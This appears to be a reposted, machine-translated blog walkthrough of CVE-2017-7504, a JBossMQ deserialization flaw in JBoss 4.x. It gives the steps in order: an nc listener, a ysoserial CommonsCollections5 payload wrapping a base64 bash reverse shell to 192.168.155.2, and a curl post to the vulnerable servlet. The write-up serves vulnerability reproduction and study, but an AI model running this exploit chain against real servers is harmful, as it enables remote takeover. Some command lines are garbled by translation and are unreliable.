Recurrence of JBoss 4.x JBossMQ JMS deserialization vulnerability (CVE-2017-7504) - Code World

Recurrence of JBoss 4.x JBossMQ JMS deserialization vulnerability (CVE-2017-7504)

Language 2023-09-11 20:05:01 views: null

1. Affected versions
Jboss AS 4.x and previous versions
2. Building environment
Insert image description here

3. Vulnerability verification:
Access /jbossmq-httpil/HTTPServerILServlet, and the following page appears, which means there is a vulnerability.
Insert image description here

4. Vulnerability recurrence
1.nc turns on monitoring
Insert image description here

2. Generate serialized data,
use tools, to generate serialized data
Bash -i> & /DEV/192.168.155.2/111 0> & 1
base64 Coding
YMFZACATASA+JIAVZGV2L3RJCC8XOTIUMTY4LJE1N S4ylzexmtegmd4mmq ==
so Payload:
Java -JAR YSOSORIAL.JAR CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser After executing
this command, a serialized file exp will be generated on the local desktop. .ser, and use cat to view its contents.
Insert image description here

Then, copy the generated exp to the JavaDeserH2HC-master directory for further use.
3. Rebound shell
Use serialized data to rebound shell
curl http://192.168.25.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @exp. ser
Insert image description here

Guess you like

Origin blog.csdn.net/wutiangui/article/details/132805003

Recurrence of JBoss 4.x JBossMQ JMS deserialization vulnerability (CVE-2017-7504)

JBoss 4.x 5.x 6.x JBossMQ JMS deserialization vulnerability

Middleware security: JBoss deserialization command execution vulnerability. (CVE-2017-7504)

JBoss 4.x JBossMQ JMS Deserialisierungs-Schwachstelle erneut aufgetreten (CVE-2017-7504)

Recurrence of JBoss JMXInvokerServlet deserialization vulnerability (CVE-2015-7501)

Повторение уязвимости десериализации JBossMQ JBoss 4.x (CVE-2017-7504)

JBoss 4.x JBossMQ JMS 역직렬화 취약점 재현(CVE-2017-7504)

Recurrencia de la vulnerabilidad de deserialización JMS JBoss 4.x JBossMQ (CVE-2017-7504)

JBoss 4.x JBossMQ JMS デシリアライゼーションの脆弱性の再発 (CVE-2017-7504)

Récurrence de la vulnérabilité de désérialisation JBossMQ JMS de JBoss 4.x (CVE-2017-7504)

JBoss 5.x/6.x deserialization vulnerability reappears (CVE-2017-12149)

Fastjson 1.2.24 deserialization (CVE-2017-18349) vulnerability recurrence

Fastjson deserialization vulnerability recurrence

Jboss deserialization vulnerability reproduction (CVE-2017-12149)

Recurrence of CVE-2015-5254 (ActiveMQ deserialization vulnerability)

JBoss5.x6.x deserialization vulnerability

CVE-2017-7525 (Jackson deserialization vulnerability)

weblogic deserialization vulnerability (CVE-2017-10271)

[High Risk] Apache Nifi JMS component has JNDI deserialization vulnerability

JBoss 4.x 5.x 6.x JBossMQ Уязвимость десериализации JMS

JBoss 4.x 5.x 6.x JBossMQ JMS-Deserialisierungsanfälligkeit

Apache Log4j Deserialization Vulnerability (CVE-2017-5645)

[vulhub vulnerability recurrence] CVE-2021-44228 Apache Log4j remote code execution vulnerability

Apache Log4j Server deserialization command execution vulnerability (CVE-2017-5645) (detailed vulnerability reproduction process)

[Vulnerability recurrence] Deserialization Command Execution Vulnerability (RCE) of Kingdee Cloud Xingkong Management Center

JBoss 4.x 5.x 6.x JBossMQ JMS 역 직렬화 취약점

JBoss 4.x 5.x 6.x Vulnerabilidade de desserialização do JBossMQ JMS

Vulnerabilidad de deserialización de JBoss 4.x 5.x 6.x JBossMQ JMS

Shiro authentication bypass vulnerability CVE-2020-1957 vulnerability recurrence

[Vulnerability Recurrence] JumpServer Unauthorized Access Vulnerability (CVE-2023-42442)

Recommended

Ranking

SpringBoot-integrate redis

[Sword pointing to offer] Interview question 03: Repeated numbers in an array

Arrangement "Offer Penalty for prove safety" string

Browser prevent the automatic generation of fill and Echo have been saved account solutions

Work hard and never slacken——2022 Yinmai Information Year-End Summary

Install jdk7 on Linux system

App common dependency management tools

EduCoder-Web程序设计基础-html5— 给表单组件添加说明-第1关：label标签相关概念

Machine learning - clustering - density clustering algorithm notes

Ant's large model is exposed, AI+ finance enters the "big model" era

Daily

More

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)

2024-04-23(30)

2024-04-22(5)

2024-04-21(0)